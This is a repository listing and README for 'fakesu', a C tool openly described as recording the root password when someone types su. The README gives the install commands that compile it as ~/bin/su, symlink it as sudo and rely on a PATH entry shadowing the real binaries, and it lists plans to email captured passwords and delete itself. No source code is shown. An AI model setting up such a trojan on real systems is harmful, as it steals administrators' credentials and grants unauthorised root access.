https://github.com/zypeh/fakesu
su password recorder
https://github.com/zypeh/fakesu
Last synced: 12 months ago
JSON representation
su password recorder
- Host: GitHub
- URL: https://github.com/zypeh/fakesu
- Owner: zypeh
- License: mit
- Created: 2013-02-20T09:29:31.000Z (over 13 years ago)
- Default Branch: master
- Last Pushed: 2018-05-06T09:15:05.000Z (about 8 years ago)
- Last Synced: 2024-04-18T21:02:56.162Z (about 2 years ago)
- Language: C
- Size: 11.7 KB
- Stars: 4
- Watchers: 2
- Forks: 4
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
Awesome Lists containing this project
README
Fakesu.c
========
Or simply click: [fakesu project-page](http://zypeh.github.io/fakesu) to get a better view.
Abstract
--------------
This is my SU password recorder which will
automatically capture SU password when root type
su.
INSTALL
-------
If you can find ~/bin direstories which are
located at the beginning of $PATH variable ((EXTREMELY BAD IDEA))
In this case nothing is simpler as:
gcc fakesu.c -o ~/bin/su
ln -s ~/bin/su ~/bin/sudo
In any other case you have to create such a directory on your own
and modify $PATH variable appropriately.
MAKE
----
There are a make config you ought to know.
- If compiled with -DCRYPTO, then all your password will be encrypted
In other case, the compiler will automically compile as plaintext
password stored.
TODO
----
- [ ] Stored password in encrypted form need to be decrypt.
- [ ] Email password and automatically kill itself.
- zypeh
[![endorse] (http://api.coderwall.com/zypeh/endorsecount.png)] (http://coderwall.com/zypeh)
[![Facebook] (http://bit.ly/VTsPK4)] (http://www.facebook.com/lisper.zypeh)